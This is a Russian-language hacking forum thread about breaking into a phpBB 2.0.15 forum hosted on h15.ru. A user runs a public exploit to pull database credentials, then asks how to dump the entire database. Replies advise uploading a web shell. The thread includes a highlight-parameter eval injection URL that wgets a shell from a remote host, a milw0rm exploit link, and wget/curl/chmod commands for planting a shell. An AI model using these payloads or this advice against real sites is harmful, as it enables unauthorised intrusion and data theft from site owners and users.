h15 mySQL
 

Всем привет! Забыл пароль от форума phpbb ;)

заюзал сплойтик, узнал пасс и логин к дб., но адресок к дб мне совсем не понравился, выглядело это вот так

Connecting OK
Sending exploit OK
Database Host: database
Database Name: xxxxxx5
Username: xxxxxx5
Password: xxxxxx5

гугл подсказал мне, что это нормально, т к доступ к mySQL на h15.ru возможен только с локал машины.

Это так???

Далее появилась идея залить с помощью PuttyFTP, скриптик, который копернул бы всю БД.
Но опять столкнулся с проблемой такого содержания, врубил Putty, указал адресок, ввел логин, а вот пасс вводиться не хочет, ни руками, ни копипастом.
Пробывал логиниться через браузер, но натыкаюсь на 403 - Forbidden
Попробывал зарегить, свой сайтик, чтобы протестить Putty на нем, но рега временно в дауне (((
Что здесь может быть не так???
Или просто у них вместе с регой и авторизация в дауне?
И вообще верна ли логика моих действий? или есть способы получше?

o.0
Хы тоже высаживался в первые разы...Когда вводишь, он не отображается на экране, ни звездочками, никак.
Тоесть: ввел и жми.

Хуже нет, когда пароль не знаешь, да еще и забыл ))

1). Залей шелл. Если смог вытащить пароли к бд, то это не проблема. В нормальном есть функция бекапа базы (хоть с локалхоста)
2). найди на сайте что-то вроде phpmyadmin

P.S. ты указываешь пароли от БД к акку от FTP?

Всем огромное спасибо, у меня еще 1 вопрос.
Не знаю о хосте на холме нечего, в мануале ихнем написано

Возможно ли изменить пассы там, т е на фтпшник и mySQL разные поставить?
Просто что то не могу я залогиться на фтп(

насколько я понял, сплойт дает 1 пасс от бд и это наверно от фтп тоже, судя из выше описанного. нет?

там и так разные уже...

нет. сплоит тебе вернул пароль от БД. ФТП аккаунт (как и SSH) совсем другой :)

понятно...
В силу слабых знаний, на этом мои гениальные идеи заканчиваются)) Можно еще чтонить сделать, зная только пасс от бд на локалмашине? форум phpbb v2.0.15

в третьем сверху сообщении я тебе уже ответил :)

Я не особо знаком с такими методами, я пока литературку полопачу, а ты если сможеш отпишись мне сеня в асю плз.

Помогите плз.
phpbb 2.0.15
Вообщем вот что мне удалось узнать

http://site.h15.ru/forum//viewtopic.php?t=&highlight='.phpinfo().'

Put_phpinfo: [/home/b/site.h15.ru/WWW/forum//viewtopic.php]

Смогу ли я залить шелл таким запросом???

http://site.h15/forum/viewtopic.php?&cmd=wget http://shells//fuck.php;&highlight='.eval($HTTP_GET_VARS[cmd]).'

Или нет???
Ответьте плз..

И еще огромная просьба, кто может дать шел, чтобы стибрить всю sql, зная логин и пасс???

Если я не прав, то плз подробно опишите куда, как, что и как потом достать)))

Вообще пробывал заюзать сплойт
http://milw0rm.com/exploits/1076
Не смог, т не знаю какой командой залить шел, оп пристал ко мне с табличкой вида
site.h15.ru/forum/$ а что написать я незнаю....

юзай nst shell :) Вообще на хэ15 дыры же латают я думаю сплойт который есть в паблике врятли поможет

Шелл заливается командой wget http://адресс шела
Главное чтобы в адресе cd была папка с правами на запись
Ну если у тебя есть права на выполнение то можно chmod 777 команду выполнить
ещё есть команды curl -0 ./shell.php http://адресс (вроде так)